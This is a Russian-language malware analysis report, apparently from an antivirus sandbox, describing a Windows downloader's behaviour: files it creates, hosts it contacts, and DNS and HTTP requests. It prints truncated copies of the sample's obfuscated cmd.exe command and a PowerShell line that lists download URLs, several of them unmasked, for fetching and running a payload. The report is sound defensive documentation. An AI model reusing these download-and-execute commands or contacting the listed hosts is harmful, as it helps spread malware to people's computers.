Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe, ,,,/V^:^O,,,/C",(^se^t ^JSI^y= ^ ^ ^ ^ }^}^{hc^t^ac^}^}k^a^erb^;n^kz$^ ^s^s^ec^or^P^-^tr^a^tS^;^)n^k^z$^(^e^l^ifo^t^eva^s^.S^q^j^$;^)yd^oB^e^sn^o^pser.nHA$^(^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\sui.exe
Сетевая активность
Подключается к
- 'hv##mpl.dk':80
- 'gv####ogados.com.br':80
- 'ki###arch.com':80
TCP
Запросы HTTP GET
- http://hv##mpl.dk/xLm
- http://ki###arch.com/HFDL
UDP
- DNS ASK hv##mpl.dk
- DNS ASK gv####ogados.com.br
- DNS ASK yo###.com.tw
- DNS ASK kn##oto.ru
- DNS ASK ki###arch.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe, ,,,/V^:^O,,,/C",(^se^t ^JSI^y= ^ ^ ^ ^ }^}^{hc^t^ac^}^}k^a^erb^;n^kz$^ ^s^s^ec^or^P^-^tr^a^tS^;^)n^k^z$^(^e^l^ifo^t^eva^s^.S^q^j^$;^)yd^oB^e^sn^o^pser.nHA$^(^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , ,,,/V:O,,,/C",(^se^t ^JSI^y= ^ ^ ^ ^ }^}^{hc^t^ac^}^}k^a^erb^;n^kz$^ ^s^s^ec^or^P^-^tr^a^tS^;^)n^k^z$^(^e^l^ifo^t^eva^s^.S^q^j^$;^)yd^oB^e^sn^o^pser.nHA$^(^et^irw^.^S^qj$;1 = ep^y...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $GiC='OnB';$utb='http://hv##mpl.dk/xLm@http://gvmadvogados.com.br/bV@http://yonli.com.tw/k@http://www.knofoto.ru/bzC@http://kiramarch.com/HFDL'.Split('@');$zkn=([System.IO.Path]::GetTempPath()+...
